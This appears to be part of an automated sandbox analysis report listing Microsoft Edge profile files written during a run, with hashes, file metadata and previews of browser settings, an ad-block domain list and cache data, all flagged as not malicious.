                                SHA-512:0F4E460DA14BAB7F44299B36D4D3E294A4C0C091CDC9D6E9A93271548BCC992A772771BE9B73B9CA54FAAAA998E418B1596682FC7E44899FE92C9C66B6A2E0BD
                                Malicious:false
                                Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fire_local_softlanding_notification":false,"fre":{"oem_bookmarks_set":true,"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\98f87f96-a066-4d5e-8cfe-9a572e4af1df.tmp

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:modified
                                Size (bytes):26032
                                Entropy (8bit):6.068103359563717
                                Encrypted:false
                                SSDEEP:768:PM7X2zt1jOXtXi3zDr7Z6UXtu+bCFlWuhuatPo:PMSzMtXijv7pCFlDu6A
                                MD5:B0A0717BB481BC93993F969D84222353
                                SHA1:C1B03FD4E50D2103797908ED07BE7E90F100073E
                                SHA-256:BC05FB2C5DC191F83993225E58F433D07E3CC0774A28EFAD85F24727F01636BC
                                SHA-512:57F2E5BC9A378E20219873EB0F33A61461F84FD45792390C2ADAF671C534A1576BEE95B99FC9129679E9AFF2085DD5361273AC63DD0D07D9FEA3263B92F35CAB
                                Malicious:false
                                Preview:{"abusive_adblocker_etag":"\"6299A61D48C25647EA67BB9AD1ED65CD4AE48010AACD34D9F797A4A16B03B527\"","apps_count_check_time":"13361265752358297","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm3rXSyzABnWdKBG+Ijlx7hEE4QTzo+AB6fnDLLJBpo7PKv8Ob367/KjUg8mcY6CmCjTJCmtsWFOcUf5vj04cw0e1yZe2WAl8svFn5IC43jfc+dLnGrEyDwAicHCxNdhlrVa5LEtTgt5u2lAK02pd1

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\a79e0449-bf65-4fa5-aaf7-36bfc132f7d0.tmp

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):106332
                                Entropy (8bit):4.638094387502577
                                Encrypted:false
                                SSDEEP:1536:B/lv4EsbMNeQ9s5Vdw34PsiaR+tDvYXridW+8uh57F8:fwrQC5VdwIiS+GdeK57F8
                                MD5:1A1EDD81729021B368E3D80F73A73234
                                SHA1:D64E1F861DAA7FE009E5EED3D53B4FAC585B23F8
                                SHA-256:FD76F4963E14CE6A513CDC4752414256D01C33E1A94E4A880D7587BA4334A267
                                SHA-512:A7833A7BAB78F4C93105CA460CCDED0106FB109C980D41BE3EF633380480816663B189B6859FE7E824C0502607BCDCF0872D22EAE37AED7384B5D65162D34829
                                Malicious:false
                                Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):106332
                                Entropy (8bit):4.638094387502577
                                Encrypted:false
                                SSDEEP:1536:B/lv4EsbMNeQ9s5Vdw34PsiaR+tDvYXridW+8uh57F8:fwrQC5VdwIiS+GdeK57F8
                                MD5:1A1EDD81729021B368E3D80F73A73234
                                SHA1:D64E1F861DAA7FE009E5EED3D53B4FAC585B23F8
                                SHA-256:FD76F4963E14CE6A513CDC4752414256D01C33E1A94E4A880D7587BA4334A267
                                SHA-512:A7833A7BAB78F4C93105CA460CCDED0106FB109C980D41BE3EF633380480816663B189B6859FE7E824C0502607BCDCF0872D22EAE37AED7384B5D65162D34829
                                Malicious:false
                                Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-66542B6E-1D60.pma

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):4194304
                                Entropy (8bit):0.04066239492362643
                                Encrypted:false
                                SSDEEP:192:Jr0EbtmqvDtKX7bJEa3XxxTxqZ/g+XA970R6ENShk7NonG1gQMfP0Bn8y08Tcm2D:V0EtYeK8YtbhysCgTPq08T2RGOD
                                MD5:49EC7CA499DCB6452E1141C3F0519E97
                                SHA1:18F80B165B4C65ABA00BB11AB12225AA5404F820
                                SHA-256:FE9FFB9CC80EB857205A622305EE743D28A6D54699B0F8F6027F825334E1D492
                                SHA-512:6E59ED549136EF24FFB5A0DD6C051DE285C685102DDED630EA591C965D96DFAB545656227F70738031729B9009502BCED108F34D483AD64EEBEE55BC3C07C8F4
                                Malicious:false
                                Preview:...@..@...@.....C.].....@...............``...P..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30....q.........117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".heayqh20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@............./......................w..U].0r........>.........."....."...2...".*.:............B)..1.3.147.37.. .*.RegKeyNotFound2.windowsR...Z.....K7..E@..$...SF@.......Y@.......Y@.......Y@........?........?.................?.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@................Y@.......Y@.......Y@........?........?z...........................................................................

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-66542B77-1E74.pma

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):4194304
                                Entropy (8bit):0.039790463861696095
                                Encrypted:false
                                SSDEEP:192:5I0EbtmqvD3KYyJEa3Xxx7uqZGXPdg34khtbNEk8NnI1gQM3jo48On8y08Tcm2Rl:u0Etke18BphlXWggzjr08T2RGOD
                                MD5:AB152D53B71DFC48EC7A7926CA4AABA8
                                SHA1:358502604C49844DFFA91664E35720F3A235DD2E
                                SHA-256:C12879A2B9259003986F76C91A270FDE836CFDFE9607F6B72191C3B68464DE5C
                                SHA-512:5AF0DA4C6CF8538E94DDA4829CAB5BD8E7AD42B02FABE66515C2DA57473207CC4875C56E1B3144A4DB5D62044B0157D60A6FD07AD5FF1E77F8C7D0BC58A4B7E7
                                Malicious:false
                                Preview:...@..@...@.....C.].....@...............h^.. N..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30....q.........117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".heayqh20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@............./......................w..U].0r........>.........."....."...2...".*.:............B)..1.3.147.37.. .*.RegKeyNotFound2.windowsR...Z.....K7..E@..$...SF@.......Y@.......Y@.......Y@........?........?.................?.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@................Y@.......Y@.......Y@........?........?z...........................................................................

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):280
                                Entropy (8bit):3.053837919135487
                                Encrypted:false
                                SSDEEP:3:FiWWltl/9UgBVP/Sh/JzvLi2RRIxINXj1Qllt:o1//BVsJDG2Yqc/
                                MD5:2DE758B44E33AEAF19BAF23B60AA10AD
                                SHA1:CC987BEF7CAFDF20BC38906BA55767454B029A6A
                                SHA-256:6E8D74D84A400AD5C68229CF1458EA52EE75018E74070152DA8A189853FBF2C6
                                SHA-512:6BFC85466FC55782132F38EB3F851FA80434494A2A1607862607065608CE11C2CFA2533C218165F869BC41B5790C6E58F8A8FBCFBFCF59623C3B90436AFD37D0
                                Malicious:false
                                Preview:sdPC......................5.y&.K.?....................................................................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................48ea0ba2-e9bb-4568-92cb-0f42a5c5d505............

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\318ab53c-f1f3-4da5-81dd-a5b43296cea3.tmp

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):9222
                                Entropy (8bit):5.180212615461894
                                Encrypted:false
                                SSDEEP:96:sVSqlPJ1Ceb9bsYrdvXmc9bkO1LVBXZYYYsY5Th6Cp9/x+6M8muecmAeCPe4zvrI:sVSUJIYrdvtf56YYsYPpj+FVAvUFBf
                                MD5:6E2730A2390482AE09BCF9232E344F9C
                                SHA1:520E894C5EB3A4CEE39F1048D7BC3CC20FAFFFB6
                                SHA-256:0D7FA7E1EC454C5EF7A1FFA44127831D0F3D75A86ADDFA03CB10373ECF717A6D
                                SHA-512:E4FCC27DEA21BC9D4690E02FFB32E2289E5EA9DE6EC6406F7F4369A17FB7071A91ED8DCD8D174C2E792F9996380A9D861B8C4FED164BD3BE88E4DCA865FF7043
                                Malicious:false
                                Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13361265752337334","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false},"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","5826"],"daily_received_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\46cd3e53-2ecd-47bb-948a-a771b461cfe0.tmp

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:very short file (no magic)
                                Category:dropped
                                Size (bytes):1
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3:L:L
                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                Malicious:false
                                Preview:.

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\6ef78991-c71e-430e-b1ca-8d73638b3225.tmp

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):25185
                                Entropy (8bit):5.571248798884802
                                Encrypted:false
                                SSDEEP:768:BSHFsSWPgSfQL8F1+UoAYDCx9Tuqh0VfUC9xbog/OVFnfuirwJUpAtuY:BSHFsSWPgSfQLu1jaCfuHJ3tP
                                MD5:4DD26FDB524CEB4E2D6F55896BBB46FF
                                SHA1:06EF12D66C78D0C9F0F8A31C5E9BE7A7955271C7
                                SHA-256:050931C18850E3FC2EFBE142970E4379EF9B4933E55EF0D0D25B1F18BD79A719
                                SHA-512:05291E21B3254C84CBB4B0930B6F46F9B86F450661103850810D8F80C7ECBEDA31BA5F021700DE67B22A180398E54BD2B586F243CD4BA300DAEA4CBD04ABF8FC
                                Malicious:false
                                Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13361265751977205","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13361265751977205","location":5,"ma

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000001.dbtmp

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):16
                                Entropy (8bit):3.2743974703476995
                                Encrypted:false
                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                MD5:46295CAC801E5D4857D09837238A6394
                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                Malicious:false
                                Preview:MANIFEST-000001.

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:data
                                Category:modified
                                Size (bytes):12733
                                Entropy (8bit):5.349140643885874
                                Encrypted:false
                                SSDEEP:192:uoiOEH/WCxkD7MDPSYAxmemxb7mngJdv9TXJ4MQmLu5/4eeNdl:uzOEOKSXs/J7mGnQmLu5/5eNdl
                                MD5:1E2D51ED04DBBA6051A264F661028C5C
                                SHA1:7422B58C770C07C338FBA2C94CCE126689352873
                                SHA-256:F9716E057E99B46295BBBDEF20C8D6BAEFD2A10AC020B5684990B8CC1D8F2A37
                                SHA-512:629DA522EB383CD1E8E09C4BF23B3D05942289AAD1A76A0023841EADDC8F9FAE9EB156C72303B6EDE52EA1F4187A7F7B39D71003087E455DCF4D6581ABDC0178
                                Malicious:false
                                Preview:...m.................DB_VERSION.1..Z..................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13361265764808724.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=Z66hqSRAIxK%2FfuiudWUa9VEzQbPIGUiDfcuGAIlqgPw%3D&st=2021-01-01T00%3A00%3A00Z&se=2024-07-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"2DPW9BV28WrPpgGHdKsEvldNQvD7dA0AAxPa3B/lKN0=","size":11989}]..A./..............'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.]{.. "configVersion": 32,.. "PrivilegedExperiences": [.. "ShorelinePrivilegedExperienceID",.. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",.. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",.. "SHOPPING_AUTO_SHOW_BING_SEARCH",.. "SHOPPING_AUTO_SHOW_REBATES",.. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",.. "SHOPPING_AUTO_SHOW_REBATES

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\CURRENT (copy)

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):16
                                Entropy (8bit):3.2743974703476995
                                Encrypted:false
                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                MD5:46295CAC801E5D4857D09837238A6394
                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                Malicious:false
                                Preview:MANIFEST-000001.

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):293
                                Entropy (8bit):5.092389357980106
                                Encrypted:false
                                SSDEEP:6:DIxqGXAs1wkn23oH+Tcwt9Eh1ZB2KLlpIx2+9t+q2Pwkn23oH+Tcwt9Eh1tIFUv:DqALfYeb9Eh1ZFLr4ovYfYeb9Eh16FUv
                                MD5:2AB24FDE025C1D860C9F9D2B182C4D24
                                SHA1:EBED5EE5F60D58A046F4CD8DA4754DEEF97EDCED
                                SHA-256:EDDC41E6471FA0D1067C96D5E3314F415B102654A554116B3DE6911CA29686B3
                                SHA-512:A8147687FADF768017DCFAB9301A626BCE2643613CDE4F39FB1803F67BE16ACED67795F26BE08146BA467530CFC434939F1782AD7F23AEA26EEC8D3798F456F2
                                Malicious:false
                                Preview:2024/05/27-02:42:42.594 2028 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db since it was missing..2024/05/27-02:42:43.913 2028 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\MANIFEST-000001

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:OpenPGP Secret Key
                                Category:dropped
                                Size (bytes):41
                                Entropy (8bit):4.704993772857998
                                Encrypted:false
                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                Malicious:false
                                Preview:.|.."....leveldb.BytewiseComparator......

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\data_0

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                Category:dropped
                                Size (bytes):8192
                                Entropy (8bit):0.01057775872642915
                                Encrypted:false
                                SSDEEP:3:MsFl:/F
                                MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                Malicious:false
                                Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\data_1

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):270336
                                Entropy (8bit):8.280239615765425E-4
                                Encrypted:false
                                SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                Malicious:false
                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\data_2

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8192
                                Entropy (8bit):0.011852361981932763
                                Encrypted:false
                                SSDEEP:3:MsHlDll:/H
                                MD5:0962291D6D367570BEE5454721C17E11
                                SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                Malicious:false
                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\data_3

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8192
                                Entropy (8bit):0.012340643231932763
                                Encrypted:false
                                SSDEEP:3:MsGl3ll:/y
                                MD5:41876349CB12D6DB992F1309F22DF3F0
                                SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                Malicious:false
                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\index

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                Category:dropped
                                Size (bytes):262512
                                Entropy (8bit):8.736218952347586E-4
                                Encrypted:false
                                SSDEEP:3:LsNlG:Ls3G
                                MD5:4BE88D23CEE11C43A3E7BB97BE94EB26
                                SHA1:AFEE8E0214E9CD0564779ED75E5E4A8484D9F917
                                SHA-256:3CC5453DE2E5FFF61155D3584940D104F3D03FC678FC3A605725A152E151C01F
                                SHA-512:BCBB755AC428B651AC2F69B149120356EC1F8FBD6E0862D641F675733FDAE97F86C7B2C5FC4A562AAAB7EA55F02323650A366F2CCC23A033A9E705DBAB705364
                                Malicious:false
                                Preview:.............................................x/.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\000001.dbtmp

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):16
                                Entropy (8bit):3.2743974703476995
                                Encrypted:false
                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                MD5:46295CAC801E5D4857D09837238A6394
                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                Malicious:false
                                Preview:MANIFEST-000001.

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\CURRENT (copy)

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):16
                                Entropy (8bit):3.2743974703476995
                                Encrypted:false
                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                MD5:46295CAC801E5D4857D09837238A6394
                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                Malicious:false
                                Preview:MANIFEST-000001.

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\MANIFEST-000001

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:OpenPGP Secret Key
                                Category:dropped
                                Size (bytes):41
